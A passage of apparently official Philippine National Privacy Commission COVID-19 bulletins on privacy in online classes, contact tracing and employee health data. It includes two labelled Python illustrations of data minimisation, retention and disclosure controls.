- Sharing submissions for an unlimited time. (When the content no longer needs to be shared, delete it.)
- Sending assignments, projects and other requirements to teachers via social media.
- Taking screenshots of the video feed of teachers and classmates.
- Spamming the chat.
- Giving out online links and their passwords to people who should not be in the class.
For parents or legal guardians
DOs
- Helping the child or ward check and customize privacy settings of the device or application for online learning.
- Teaching them basic online security (e.g. enabling two-factor authentication and avoiding sharing homework, passwords, and other personal information even with friends).
- Taking a moment to peruse the school’s privacy policy.
- Ensuring that your consent is obtained for the recording of classes. Consider being present during these sessions, especially if the student is a minor.
DON'Ts
- Leaving the child, especially minors, unsupervised during the conduct of online learning.
For teachers
Teachers must always consider the privacy, equity, & peculiarity among students when conducting online classes:
- Privacy: Students might feel uncomfortable displaying their living space to their peers. Family members might not want their image or video to be captured. Students might also take a screenshot of a classmate’s video feed, which can lead to cyberbullying and privacy issues.
- Equity: Not all students have reliable internet access. Some might have low bandwidth, be unable to afford to stream videos, or have limited access to digital devices.
- Peculiarity: Some students might feel shy or anxious on camera, affecting their performance in class.
DOs
- Making webcam use optional in online classes.
- Recording online classes as long as the recording has legitimate uses (e.g. reviewing the lecture presentations and viewing by students who are unable to attend).
- Considering the principles of legitimate interest and proportionality during online proctoring, in which a student’s test duration is monitored using a webcam, microphone, or accessing the student’s screen. Weigh the interests of the students against those of the educational institutions to determine the appropriate balance.
- Obtaining the explicit consent of the student (or parent/legal guardian for minors) before the conduct of online proctoring.
- Letting students decide whether they would turn on the cameras of their devices. They should be permitted to use virtual backgrounds and fun filters.
- Asking questions regularly to assess students’ understanding. Allow them to respond through audio or the videoconferencing app’s chat and features, such as polls and nonverbal actions (e.g. thumbs up), instead of requiring them to turn on their cameras.
DON'Ts
- Posting announcements that involve personal data, such as grades and results of assignments. For example, exam results should be given on an individual basis and not released en masse.
- Allowing students to submit projects and assignments via social media platforms.
- Storing personal data collected as part of the class in a personal account or device.
- Correlating a student’s camera use and eye contact with participation, grading and attendance (e.g. giving students plus points if their cameras are on).
- Removing students from the class or forcing them to turn their cameras on.
For schools
DOs
- Adopting a particular learning management system (LMS) or online productivity platforms (OPP) where all activities pertaining to online learning should be conducted.
- Ensuring that the LMS or OPP has adequate data protection features.
- Informing students before collection about the personal data to be processed and the reasons, using timely, age-appropriate, clear and concise language.
- Exercising caution when integrating apps, supporting tools and other services with an LMS or OPP, as these other services may come with vulnerabilities.
- Being familiar and up to date with all privacy-related trends. This will be of help in crafting data policies that meet the level of protection students need.
- Referring to NPC resources to ensure proper protection of students’ personal data.
- Forming a data breach response team responsible for creating and implementing an incident-response procedure.
- Establishing policies and implementing them effectively to prevent or minimize breaches and to ensure timely discovery of a security breach.
- Conducting and investing in security audits and tests, such as privacy impact assessment, source-code audit, vulnerability assessment and penetration testing.
- Strengthening systems against prominent web attacks.
  - A well-structured system, including both the front-end and back-end, ensures the protection of data against common web attacks.
  - The vulnerabilities found in the conduct of audits and tests must be fixed first before the system is used further.
  - It is important to secure the communication between a user’s browser and the school website to add another layer of protection to the system.
- Updating systems and their components.
  - The security and privacy vulnerabilities of yesterday may not be the same today.
  - Make a conscious effort to continuously improve or update systems and implement best practices in configuring or hardening them (e.g., database encryption at rest, encryption in transit, network access controls, data access controls and audit logs).
  - Install a web application firewall to deter distributed denial of service attacks.
- Backing up data.
  - When conducting regular maintenance like a system update, upgrade or configuration change, run a full backup of the school website.
  - A full backup must follow the system documentation consistently and be cleared by an accountable officer in the school, such as the Data Protection Officer.
  - Online backups are also a convenient way to ensure an accessible copy of the website when the need arises. The “3-2-1” strategy can be used:
    - 3 total copies of the data
    - 2 copies are local but on different media
    - 1 copy is offsite, which may be geographically separated or in an online cloud computing platform
- Migrating to the cloud is an option.
  - Use of cloud computing services reduces capital expenses like housing and maintaining the school’s data centers with servers, storage and other active ICT components.
  - In addition, the cloud eliminates the tedious task of upholding the security of the school infrastructure. The cloud service provider does that for the school.
  - However, keep in mind that proper security and routine maintenance of the web application that runs in the cloud is the school’s full responsibility.
DON'Ts
- Keeping personal data longer than their intended purpose. (Set retention periods and employ mechanisms for frequent purging of messages or interactions between teachers, students and parents.)
NPC PHE Bulletin No. 15: Guidelines for Establishments on the Proper Handling of Customer and Visitor Information for Contact Tracing
Pursuant to DTI Memorandum Circular 20-28, s. 2020 (Guidelines to Follow on Minimum Health Protocols for Barbershops and Salons) and DTI Memorandum Circular 20-37, s. 2020 (Guidelines to Follow on Minimum Health Protocols for Dine-in Restaurants and Fastfood Establishments), establishments are required to implement contact tracing measures as one of the mandatory minimum requirements for operation. The National Privacy Commission (NPC) issues this Bulletin to guide establishments on the proper handling and protection of personal data collected from their customers and visitors.
Collect only what is necessary
Establishments should ensure that the processing of personal data is proportional to the purpose of contact tracing. Collect only such information as required under existing government issuances. Establishments may adopt sample health checklist forms issued by government agencies but should not collect beyond what is required and necessary.
Be transparent
Establishments should inform their customers and visitors of the collection of their personal data and the reasons for such collection. This can be done by posting a privacy notice which is readily visible within the establishment’s premises, such as points of entry, and other conspicuous areas. If the establishment opts to use electronic means, the notice must be posted in the platform prior to collection.
For further information on the processing activity, establishments may direct their customers and visitors to their official websites or social media pages, as well as official websites of pertinent government agencies to provide them with information on the possible uses of their personal data for contact-tracing purposes.
Establishments must ensure that the privacy notice is easy to access, understandable, and uses clear and plain language.
Use information only for the declared purpose
All establishments should use only the personal data collected through health checklists or other similar forms for the purpose of contact-tracing measures. Repurposing the use of data other than contact tracing and storing data for speculative use is not allowed.
Establishments are responsible for reminding their employees and third-party service providers, such as security personnel, that using the collected personal data of customers or visitors for any other purpose is punishable under the Data Privacy Act of 2012 (DPA).
Implement security measures
All establishments that collect personal information, whether through physical or electronic means, have the obligation to implement reasonable and appropriate safeguards (organizational, physical, and/or technical security measures) to protect the personal data of their customers and visitors against any accidental or unlawful processing, alteration, disclosure, and destruction.
Keep the data only for a limited period
All personal data collected for the purpose of contact tracing shall be retained only for a period allowed by existing government issuances. After which, all personal data should be disposed of in a secure manner that would prevent further processing and/or unauthorized access or disclosure.
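As an added example that is not part of the NPC bulletin, the Python sketch below applies the bulletin's "collect only what is necessary" and "keep the data only for a limited period" rules to constructed contact-tracing submissions. The allowed field list and the 30-day retention period are placeholders, since the bulletin defers both to the applicable government issuances; the disposal log it produces carries only counts and dates, never the personal data itself.

```python
"""Data minimisation and retention purge for contact-tracing records (added example)."""
from __future__ import annotations

from datetime import datetime, timedelta, timezone

# Constructed placeholder: the fields the establishment's health checklist is
# assumed to require. The real list comes from the applicable DTI/DOH issuance.
ALLOWED_FIELDS = frozenset({"name", "contact_number", "visit_time", "symptom_free"})

# Constructed placeholder retention period; substitute the period the
# applicable issuance allows.
RETENTION = timedelta(days=30)

# Constructed reference "now" so the purge below is reproducible.
REFERENCE_NOW = datetime(2020, 9, 15, tzinfo=timezone.utc)


def minimise(submission: dict) -> tuple[dict, list[str]]:
    """Keep only the fields the checklist needs and report which ones were dropped."""
    kept = {k: v for k, v in submission.items() if k in ALLOWED_FIELDS}
    dropped = sorted(k for k in submission if k not in ALLOWED_FIELDS)
    return kept, dropped


def is_expired(record: dict, now: datetime) -> bool:
    """A record is past retention once visit_time + RETENTION is no later than now."""
    visit = datetime.fromisoformat(record["visit_time"])
    if visit.tzinfo is None:
        visit = visit.replace(tzinfo=timezone.utc)  # treat naive timestamps as UTC
    return visit + RETENTION <= now


def purge(records: list[dict], now: datetime) -> tuple[list[dict], dict]:
    """Split records into those still within retention and a disposal log.

    The log deliberately holds only a count and the date range disposed of, so it
    can be kept for accountability without becoming a second copy of the data.
    """
    retained: list[dict] = []
    gone: list[dict] = []
    for rec in records:
        (gone if is_expired(rec, now) else retained).append(rec)
    log = {
        "disposed_at": now.isoformat(),
        "disposed_count": len(gone),
        "oldest_visit": min((r["visit_time"] for r in gone), default=None),
        "newest_visit": max((r["visit_time"] for r in gone), default=None),
    }
    return retained, log


# Constructed sample submissions; not real customer data.
SAMPLE_SUBMISSIONS = [
    {"name": "A. Santos", "contact_number": "09170000001",
     "visit_time": "2020-08-01T12:00:00+08:00", "symptom_free": True,
     "email": "a@example.invalid", "birthdate": "1990-01-01"},
    {"name": "B. Reyes", "contact_number": "09170000002",
     "visit_time": "2020-09-10T18:30:00+08:00", "symptom_free": True,
     "home_address": "123 Example St"},
]


def run_demo(now: datetime) -> tuple[list[dict], dict, list[str]]:
    """Minimise every submission, then purge those past retention as of `now`."""
    minimised: list[dict] = []
    all_dropped: list[str] = []
    for sub in SAMPLE_SUBMISSIONS:
        kept, dropped = minimise(sub)
        minimised.append(kept)
        all_dropped.extend(dropped)
    retained, log = purge(minimised, now)
    return retained, log, all_dropped


if __name__ == "__main__":
    retained, log, dropped = run_demo(REFERENCE_NOW)
    print(f"fields dropped at collection: {dropped}")
    print(f"records retained: {len(retained)}; disposal log: {log}")
```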
For further information, we may be reached at [email protected].
# # #
NPC PHE Bulletin No. 14: Updated Frequently Asked Questions (FAQs) Isinalin sa Wikang Tagalog
We are releasing these updated FAQs in response to queries raised with us by stakeholders on data protection under return-to-work and work-from-home arrangements.
Employers, whether in government or the private sector, are expected to be responsible and fully accountable for the processing of personal data to address the public health risk posed by COVID-19. Likewise, employees are expected to cooperate with the reasonable and appropriate collection of their data to help curb the spread of COVID-19 and keep their co-workers and visitors safe. Overall, our guidelines aim to promote best practices in our workplaces, which now also extend to the homes of employees working from home.
The National Privacy Commission continues to maintain that, in these extraordinary times, everyone’s health is the priority and the Data Privacy Act is not an obstacle to fighting COVID-19. We believe that the effective use of personal data is key to our success in this battle. We must remain vigilant in this fight, mindful of our own health as well as the health and safety of all.
RAYMUND ENRIQUEZ LIBORO
Privacy Commissioner
On returning to work:
- What types of personal data may an employer collect from its employees? May they collect health information? How can this be done with due regard for privacy?
Employers have a legitimate basis for collecting additional personal data, including employees’ health information, during the pandemic. Employers may collect personal data necessary for the declared and legitimate purpose of helping control the spread of the virus and keeping workers and visitors to their premises safe. Similar guidance has also been issued by partner government agencies on this matter, such as the contact tracing rules of the Department of Health, the guidelines on keeping workplaces COVID-19-free of the Department of Trade and Industry (DTI) and the Department of Labor (DOLE), and the guidelines on alternative work arrangements of the Civil Service Commission (CSC), among others. Employers should consult these issuances when crafting their anti-COVID-19 policies.
In collecting and processing employee data, which now includes health data, employers are urged to follow the data privacy principles of transparency, legitimate purpose, and proportionality. Collect only what is necessary to achieve the declared purpose. Employers should be transparent with their employees, especially at this time.
After collection, employers must safeguard the security of the data contained in physical and digital documents such as electronic forms, symptom questionnaires, and health status survey forms of employees.
Establish a health information policy within the company that specifies the following: who is authorized to collect the information, who will know the results of health tests, how the information will be protected, and how it will be reported to the authorities when required.
- How long may employers keep the collected personal data?
Employers may retain the personal data collected from their employees until the purpose of collection has been achieved, in accordance with the protocols of the government agencies that will use the data. Once the purpose has been achieved, the personal data must be deleted or destroyed in a manner that prevents any further use by others, especially unauthorized persons.
- In implementing minimum health standards, may employers check the temperature of employees returning to work? May employees refuse?
Yes. Employers may check the temperature of employees returning to work.
Under DOH Department Memorandum No. 2020-0220, employees returning to their workplace will be screened for COVID-19 symptoms such as fever, cough, colds, and other respiratory symptoms. Daily temperature and symptom checks for all personnel reporting to work are part of preventing and controlling this disease.
Kung kaya, nararapat na matingnan ang temperatura ng mga empleyadong papasok, alinsunod sa nailabas nang mga tagubilin ng iba’t ibang sangay ng gobyerno. Ang mga empleyado ay dapat makipagtulungan sa kanilang employer upang masiguro ang kaligtasan ng lahat ng babalik sa trabaho. Ang mga employer naman ay inaasahang gumamit ng mga makatwiran na pamamaraan sa pagkolekta ng datos para masiguro ang data privacy, ‘gaya ng pagtuturo sa mga security guard at iba pang tauhan, na huwag isapubliko ang temperatura ng sino man, at maglagay na rin ng protocol sa pagpapatupad ng minimum health standards na nagbibigay puwang din naman ang karapatan at kalayaan ng mga indibidwal.
- Maaari bang tingnan ng mga employer ang travel history at datos na kasama nito?
Oo. Ang travel history ay kasama na sa regular na medical assessment ukol sa COVID-19. Ang mga employer ay maaaring kumolekta ng data ukol dito alinsunod sa pangangailangan at patakaran ng DOH.
- Maaari bang ang mga employer ay magbahagi sa iba ng health information na makokolekta sa mga empleyado? Maaari ba itong gamitin sa ibang layunin? Dapat ba na ipagbigay-alam ang mga impormasyong ito sa mga awtoridad pangkalusugan?
Ang health data ng mga empleyado ukol sa COVID-19 ay pwede lamang ilahad ng employer sa: 1) DOH, 2) mga opisinang awtorisado ng DOH, at 3) mga opisinang awtorisado ng batas; alinsunod sa mga patakaran ukol sa bagay na ito. Ang paggamit ng nakuhang personal na datos ay pwede lamang gamitin sa mga layunin na dineklara sa mga empleyado.
- Pwede bang magtabi ang employer ng kopya ng mga health data na nakalap sa mga empleyado, gaya ng temperatura ng katawan, resulta ng antibody tests, o kaya’y maging ang COVID-19 diagnosis? Gaano katagal naman nila pwede itabi ang mga ito?
Oo. Ang mga kopya ng health data ng empleyado, ‘gaya ng temperatura ng katawan, resulta ng pagsusuri sa antibodies, pati na ang COVID-19 diagnosis, ay maaaring itabi ng employer pansamantala hanggang sa makamit ang layunin sa kanilang koleksyon. Sa panahon na ang mga ito ay nasa pag-iingat ng employer, nararapat na mayroong security measures (organizational, physical, at technical) na ipinatupad ukol dito, upang maiwasan ang ‘di awtorisadong paggamit.
Sa naka-work from home (WFH) setup:
- Pwede bang i-monitor ng employer ang mga empleyado na gumagamit ng mga company-issued devices habang sila ay naka-WFH, sa pamamagitan ng mga monitoring software?
Oo, bilang pagtaguyod sa legitimate interests ng mga employer, pwede silang mag-monitor sa mga empleyado na naka-WFH, subalit sa paraan lamang na balanse, na walang nalalabag na mga karapatan at kalayaan, at alinsunod na rin sa data privacy principles.
Iginigiit namin ang mga tinalakay sa NPC Advisory Opinion No. 2018-084: Ang pag-monitor ng mga aktibidad ng empleyado habang gamit niya ang isang computer na pag-aari ng opisina ay pinapayagan sa ilalim ng DPA, datapwat ang pag-momonitor na ito ay sakop ng isa sa mga criteria ng lawful processing sa ilalim ng Section 12 at/o kaya’y 13 ng batas na ito.
Dapat transparent ang mga employer at abisuhan ang kanilang mga empleyado na napapasailalim sila sa monitoring. Dapat magkaroon ng pagsusuri kung talaga bang kailangan ang ganitong monitoring, hanggang saan ang sakop nito (paraan ng pag-monitor), at kung nakakamit ba ang layunin sa likod nito (halimbawa, para matiyak na produktibo ang mga empleyado). Ipinapayo rin sa mga employer na mag-privacy impact assessment (PIA) sa mga monitoring software na gagamitin para alamin ang peligro sa paggamit nito, at gawan ng paraan na ito’y mapigilan o mabawasan. Dapat magpatupad ang mga employer ng malinaw na mga polisiya na pagbabatayan ng procedures sa pag-monitor.
At isa pa, dapat ikonsidera ng mga employer na may mga pamamaraan ng pag-monitor na hindi gaanong nakakapanghimasok sa privacy ng mga empleyado, at piliin ang mga ito kaysa sa mga paraan na sobra-sobrang datos na ‘di kailangan ang nakakalap, ‘gaya ng pag-rekord sa galaw ng mouse ng computer, pagpindot sa keyboard, random na pagkuha ng screenshots, pagbukas ng webcam para makunan ang empleyado, atbp.
- Maaari bang i-require ng mga employer na naka-video ang mga empleyado habang nasa oras ng paggawa, o lampas pa rito kung sila ay naka-overtime, bilang katibayan ng trabaho sa araw na iyon?
Hindi. Idinidikta ng prinsipyo ng proportionality na dapat ang pagproseso ng impormasyon ay sapat, makabuluhan, naaayon sa sitwasyong kinakailangan, at hindi labis. Ang pagproseso sa personal na datos ay gagawin lamang kung ang layunin ng pagprosesong ito ay ‘di makakamit sa ibang paraan.
Dapat umiwas ang employer sa mga paraan ng pamamahala sa empleyado na sukdulang mapanghimasok sa privacy, lalo pa’t may iba namang paraan upang masiguro na ginagawa nila ang kanilang trabaho.
- Paano masisiguro ng mga employer na ligtas gamitin ang personal data processing systems habang naka-WFH?
Masisiguro ng mga employer na ligtas gamitin ang kanilang personal data processing systems habang nagapapatupad ng WFH setup sa pamamagitan ng pagbibigay sa mga empleyado ng tamang ICT equipment at karampatang gabay o alalay sa paggamit ng mga ito. Napakahalaga rin na ang mga polisiya ng opisina ukol sa proteksyon at privacy ng datos na maayos na ibinabahagi sa mga empleyado.
Partikular sa gobyerno, dapat seguruhin ng mga pinuno ng mga ahensya na ang mga empleyado ay may access o nabigyan ng mga gamit sa komyunikasyon (laptop, computer, internet, telephone, mobile phone, atbp.) upang makapagtrabaho nang maayos.
Maaaring sumangguni sa aming naunang bulletin ukol sa WFH: NPC PHE Bulletin No. 12 na tinalakay ang Protecting Personal Data in a Work From Home Arrangement (https://www.privacy.gov.ph/2020/05/npc-phe-bulletin-no-12-protecting-personal-data-in-a-work-from-home-arrangement/).
Para sa karagdagang impormasyon, maaaring tingnan ang mga sumusunod na issuances:
- National Privacy Commission COVID-19 Bulletins: https://www.privacy.gov.ph/list-of-npc-issuances-related-to-covid-19/
- DOH Memorandum No. 2020-0220 https://www.doh.gov.ph/sites/default/files/health-update/dm2020-0220.pdf
- DOH Department Memorandum No. 2020-0151 https://www.doh.gov.ph/sites/default/files/health-update/dc2020-0174.pdf
- DTI and DOLE Interim Guidelines on Workplace Prevention and Control of COVID-19 https://www.dole.gov.ph/php_assets/uploads/2020/05/DTI_and_DOLE_InterimGuidelinesonWorkplacePreventionandControlofCOVID19__3.pdf
- CSC MC No. 10, s. 2020 http://www.csc.gov.ph/phocadownload/MC2020/MC%20No.%2010,%20s.%202020.pdf
- IATF Omnibus Guidelines on the Implementation of Community Quarantine in the Philippines https://www.officialgazette.gov.ph/downloads/2020/05may/20200515-omnibus-guidelines-on-the-implementation-of-community-quarantine-in-the-philippines.pdf
# # #
NPC PHE Bulletin No. 14: Updated Frequently Asked Questions (FAQs)
We issue the following guidance and responses to the updated FAQs raised by stakeholders’ concerns on returning-to-work and current work-from-home arrangements.
We expect employers, whether in the government or the private sector, to process personal data responsibly and with accountability in order to address existing health threats brought by COVID-19. We also expect employees to cooperate to reasonable and appropriate collection of their information to mitigate COVID-19 related risks and keep their co-workers and visitors safe. Overall, our guidelines are intended to produce best practices in the workplace that now extend to the homes of employees working remotely.
The National Privacy Commission (NPC) remains steadfast that in this extraordinary time, public health remains our primary concern and that the Data Privacy Act is not a hindrance to beating COVID-19. It is our view that the effective use of personal data is crucial in winning this battle and recovering in its aftermath. And we must remain vigilant in this fight by being mindful of our own health and the health and safety of others.
RAYMUND ENRIQUEZ LIBORO
Privacy Commissioner
On returning to work
- What type/s of personal data can employers collect from employees? Can employers collect health information? How can this be done with the best consideration for privacy?
There is a legitimate basis for employers to collect additional personal data, including health information, from employees during the pandemic. Employers may collect personal data that are necessary for a specified and legitimate purpose, to help control the spread of the virus and keep their workers and visitors safe. Parallel guidelines have been issued by the concerned government agencies in this regard, e.g. the contact tracing rules of the Department of Health (DOH), the guidelines on COVID-19 prevention in the workplace of the Department of Trade and Industry (DTI) and the Department of Labor (DOLE), and the guidelines on alternative work arrangements of the Civil Service Commission (CSC), among others. Employers should refer to these guidelines in coming up with their COVID-19 related policies.
In collecting and processing data from the employees, which shall inevitably include health data, all employers are enjoined to adhere to data privacy principles of: transparency, legitimate purpose and proportionality. Keep collection to the minimum information necessary and use appropriate means to achieve the purpose. It is essential for employers to be transparent with their employees during this time.
Once collected, reasonable and appropriate safeguards should be in place to ensure the security of the physical or electronic forms used, i.e., health symptoms questionnaires or health status survey forms, under the custody of the employer.
Set a health information policy within the company considering the following, among others: determination of who is authorized to gather the information, who should know the results, how to secure the information, and how to disclose it to authorities when necessary.
- How long can employers retain the personal data that they have collected?
Employers may retain the personal data collected from employees as necessary to fulfill the purpose for which these were collected, pursuant to the protocols of the relevant public authorities. After the fulfillment of such purpose/s, personal data shall be disposed of in a secure manner that prevents any unauthorized processing.
- In keeping with implementing the minimum health standards, can employers regularly check the temperature of employees returning to work? Can employees refuse to have such temperature checks?
Yes. Employers may regularly check the temperature of employees returning to work.
According to the DOH Department Memorandum No. 2020-0220, employees physically reporting to their workplaces shall be screened for COVID-19 symptoms, including fever, cough, colds, and other respiratory symptoms. Daily temperature and symptom monitoring and recording of all staff who will report for work are part of prevention and control measures.
Hence, it is necessary to conduct temperature checks under existing issuances of the various public authorities. Employees should find it reasonable to be screened and must cooperate with their employers to ensure the safety of all returning employees. Employers are expected to use reasonable measures to ensure privacy when doing the collection, like instructing security guards or other personnel to refrain from publicly announcing a person’s temperature results and putting in place protocols to implement minimum health standards mindful of the rights and freedoms of data subjects.
- Can employers continue checking for travel history and data?
Yes. Travel history is now included in usual medical assessments. Employers may collect such data in compliance with the DOH requirements.
- Can employers disclose to other parties the health information collected from employees? Can it be used for other purposes? Can they reveal these data to health authorities?
Any disclosure of employee health data related to COVID-19 must be limited to 1) the DOH, 2) entities authorized by the DOH, and 3) entities authorized by law, following all existing protocols on the matter. Collected employee data shall be used solely for the specified and declared purpose/s.
- Can employers retain information collected about employees’ temperature checks, results of antibody testing, and/or COVID-19 diagnosis? How long can they retain such information?
Yes. Temperature checks, results of antibody testing, and/or COVID-19 diagnosis may be retained as necessary to fulfill the purpose for which these were collected, pursuant to the protocols of the relevant public authorities. Retention requires that appropriate security measures (i.e. organizational, physical, and technical) are implemented in order to prevent unlawful processing or unauthorized access by other employees or third parties.
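The retention, disclosure and purpose-limitation answers above (and their Filipino counterparts earlier on this page) can be enforced in code rather than left to procedure. The following is an added illustration, not NPC code: its record fields, recipient categories and sample data are constructed, and the audit list stands in for whatever logging an organization actually uses.

```python
"""Custody controls for employee COVID-19 health data (added illustration, not NPC code).

Three rules from the FAQ are enforced: data is used only for the purpose
declared at collection; it is disclosed only to the DOH, entities authorized
by the DOH, or entities authorized by law; and it is retained only until the
declared purpose is fulfilled, after which the content is disposed of.
Record fields, recipient categories and the sample data are constructed.
"""
from dataclasses import dataclass
from datetime import date
from typing import List, Optional

# Recipient categories to which the FAQ limits disclosure (constructed labels).
AUTHORIZED_RECIPIENT_CATEGORIES = {"DOH", "DOH_AUTHORIZED", "AUTHORIZED_BY_LAW"}


@dataclass
class HealthRecord:
    employee_id: str
    kind: str                   # "temperature", "antibody_test", "diagnosis"
    value: str
    purpose: str                # purpose declared to the employee when collected
    collected: date
    purpose_fulfilled: Optional[date] = None   # set once the purpose is achieved
    disposed: bool = False


class HealthDataRegistry:
    """Holds records under the employer's custody and logs every decision."""

    def __init__(self) -> None:
        self.records: List[HealthRecord] = []
        self.audit: List[str] = []   # append-only trail; stands in for real logging

    def collect(self, rec: HealthRecord) -> None:
        self.records.append(rec)

    def use_for(self, rec: HealthRecord, purpose: str) -> bool:
        """Purpose limitation: a record may be used only for its declared purpose."""
        ok = not rec.disposed and purpose == rec.purpose
        if not ok:
            self.audit.append(f"DENIED use of {rec.employee_id}/{rec.kind} for {purpose!r}")
        return ok

    def disclose(self, rec: HealthRecord, category: str, recipient: str) -> bool:
        """Disclosure is allowed only to the DOH, DOH-authorized entities or
        entities authorized by law; anything else is refused and logged."""
        if rec.disposed or category not in AUTHORIZED_RECIPIENT_CATEGORIES:
            self.audit.append(f"DENIED disclosure of {rec.employee_id}/{rec.kind} to {recipient}")
            return False
        self.audit.append(f"DISCLOSED {rec.employee_id}/{rec.kind} to {recipient} [{category}]")
        return True

    def dispose_fulfilled(self, today: date) -> int:
        """Retention: once the declared purpose is fulfilled the content is
        cleared so the record can no longer be processed; returns the count."""
        n = 0
        for rec in self.records:
            if rec.purpose_fulfilled and rec.purpose_fulfilled <= today and not rec.disposed:
                rec.value = ""           # content removed; the stub documents the disposal
                rec.disposed = True
                self.audit.append(f"DISPOSED {rec.employee_id}/{rec.kind}")
                n += 1
        return n


def demo():
    """Walk two constructed records through use, disclosure and disposal decisions."""
    reg = HealthDataRegistry()
    temp = HealthRecord("E-001", "temperature", "36.8 C", "entry screening",
                        date(2020, 6, 1), purpose_fulfilled=date(2020, 6, 1))
    diag = HealthRecord("E-002", "diagnosis", "COVID-19 positive", "contact tracing",
                        date(2020, 6, 1))
    reg.collect(temp)
    reg.collect(diag)
    results = {
        "use_declared_purpose": reg.use_for(diag, "contact tracing"),
        "use_other_purpose": reg.use_for(diag, "performance review"),
        "disclose_to_doh": reg.disclose(diag, "DOH", "DOH regional office"),
        "disclose_to_vendor": reg.disclose(diag, "VENDOR", "payroll provider"),
        "disposed": reg.dispose_fulfilled(date(2020, 6, 2)),
        "use_after_disposal": reg.use_for(temp, "entry screening"),
    }
    return reg, results


if __name__ == "__main__":
    registry, outcome = demo()
    print(outcome)
    print("\n".join(registry.audit))
```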
On work from home (WFH):
- Can employers monitor employees during WFH through the installation of monitoring software in company-issued devices?
Yes, employers in exercising their legitimate interest may monitor employees during WFH but should balance it with the rights and freedoms of their employees and adherence to the general data privacy principles. We reiterate the discussions in NPC Advisory Opinion No. 2018-084: monitoring employee activities when he or she is using an office-issued computer may be allowed under the DPA, provided the processing falls under any of the criteria for lawful processing under Sections 12 and/or 13 of the law.
Employers must be transparent to the employees and notify them that they are being monitored. There should be an assessment of the necessity and proportionality of the monitoring (i.e. the method of monitoring) vis-à-vis the objective of the same (i.e. ensuring productivity while under WFH). It is also recommended for the employers to conduct a privacy impact assessment (PIA) of the monitoring software to determine risks and how to mitigate them. Employers should likewise implement clear policies with regard to its monitoring procedures.
Further, less privacy-intrusive means of monitoring should be considered rather than excessive and disproportionate monitoring mechanisms such as tracking mouse movements, recording keystrokes, taking random photos of the computer screen, enabling webcams to take a picture of the employee, etc.
- Can employers require employees to stay on video during business hours or even beyond as when they render overtime work, as proof of work done during the day?
No. The proportionality principle dictates that the processing of information shall be adequate, relevant, suitable, necessary, and not excessive. Personal data shall be processed only if the purpose of the processing could not reasonably be fulfilled by other means. Employers should avoid extreme privacy intrusive means of managing employees as there are other available means of ensuring that employees are doing their assigned tasks.
- How can employers ensure that personal data processing systems being used during WFH are secured?
Employers can secure personal data processing systems being used during WFH by providing proper ICT equipment and support facilities and mechanisms to the employees. More importantly, data protection and privacy policies should be in place to guide the staff.
Specifically, for the government, the heads of agencies shall ensure that employees have access to, or are provided with, communication equipment or facilities (laptop, computer, internet, telephone, mobile phone, etc.) to carry out their functions.
You may refer to our previous bulletin on WFH: NPC PHE Bulletin No. 12 on Protecting Personal Data in a Work From Home Arrangement (https://www.privacy.gov.ph/2020/05/npc-phe-bulletin-no-12-protecting-personal-data-in-a-work-from-home-arrangement/).
For more information, please refer to the following related issuances:
- National Privacy Commission COVID-19 Bulletins: https://www.privacy.gov.ph/list-of-npc-issuances-related-to-covid-19/
- DOH Memorandum No. 2020-0220 https://www.doh.gov.ph/sites/default/files/health-update/dm2020-0220.pdf
- DOH Department Memorandum No. 2020-0151 https://www.doh.gov.ph/sites/default/files/health-update/dc2020-0174.pdf
- DTI and DOLE Interim Guidelines on Workplace Prevention and Control of COVID-19 https://www.dole.gov.ph/php_assets/uploads/2020/05/DTI_and_DOLE_InterimGuidelinesonWorkplacePreventionandControlofCOVID19__3.pdf
- CSC MC No. 10, s. 2020 http://www.csc.gov.ph/phocadownload/MC2020/MC%20No.%2010,%20s.%202020.pdf
- IATF Omnibus Guidelines on the Implementation of Community Quarantine in the Philippines https://www.officialgazette.gov.ph/downloads/2020/05may/20200515-omnibus-guidelines-on-the-implementation-of-community-quarantine-in-the-philippines.pdf
# # #
PH to lead global privacy taskforce on COVID-19
The National Privacy Commission (NPC) is leading the newly formed COVID-19 taskforce of the Global Privacy Assembly (GPA), instituted to guide 134 jurisdictions around the world in enabling effective government response to the pandemic while continuing to protect citizens’ personal data and privacy.
Privacy Commissioner Raymund Enriquez Liboro commenced his chairmanship of the taskforce in an inaugural meet last 26 May, coinciding with the Privacy Awareness Week (PAW) 2020.
“Our aim for this taskforce is to examine current privacy concerns, while finding the right balance between supporting innovation to combat the pandemic and ensuring people’s personal data and information rights are respected. We will draw on the expertise of our membership and stakeholders to provide useful insight on common challenges,” Liboro said.
The taskforce aims to drive practical responses to privacy issues emerging from the pandemic, as well as to assist its membership with insight and best practices. Initially, it will train its focus on two strategic fronts: data protection for contact tracing applications, and privacy in a post-crisis landscape where countries begin to ease their COVID-19 restrictions.
“We have seen that personal data and technology have become essential in helping governments respond to the COVID-19 pandemic. From contact tracing and disease surveillance applications, to COVID-19 testing as people start going back to the workplace, data protection and privacy have never been more important,” Liboro said.
In a message, GPA Chair Commissioner Elizabeth Denham thanked Liboro for accepting the new role to lead the taskforce.
“The Philippines was a great example of a country where the privacy commission had been able to work with national authorities and others in efforts to combat the pandemic, exercising its role as both enabler and protector of citizens’ personal data. As a member of the GPA Executive Committee which had decided on establishment of the Taskforce, Commissioner Liboro was already bringing his customary energy and vision to the new role,” Denham said.
The taskforce is composed of members from Europe, Asia, North America, the Middle East, Australia and New Zealand. It also includes international organizations as observers, such as the International Committee of the Red Cross and the Organization for Economic Co-operation and Development.
Formerly known as the International Conference of Data Protection and Privacy Commissioners (ICDPPC), the Global Privacy Assembly, established in 1979, is the premier global forum for data protection and privacy authorities.
Meantime, the NPC marked the celebration of PAW 2020 in the country with the holding of the 3rd National Data Privacy Conference via a mass video conference last Friday, attended by some 2,000 online participants, many of whom are registered Data Protection Officers.
Dubbed “Enabling Trust in the New Normal: Reimagining Privacy in the Time of Pandemic,” the live online conference discussed how organizations may retain data subject trust as they adapt to changes under the new normal. This involves the adoption of better defenses against continuing attempts of cyberattacks on the sensitive personal data of the public in the time of pandemic.
# # #
NPC PHE Bulletin No. 13: Press Statement of Privacy Commissioner Raymund Enriquez Liboro on the collection of personal data to aid in contact tracing relevant to the COVID-19 response
The National Privacy Commission (NPC) recognizes the importance of effective contact tracing and a whole-of-government approach as a main public health intervention and strategy against COVID-19.
Thus, the Commission is closely coordinating with the Department of Health (DOH) to ensure that its guidelines are consistent with the Data Privacy Act of 2012, the law’s implementing rules and regulations and other related NPC issuances.
DOH guidelines on contact tracing
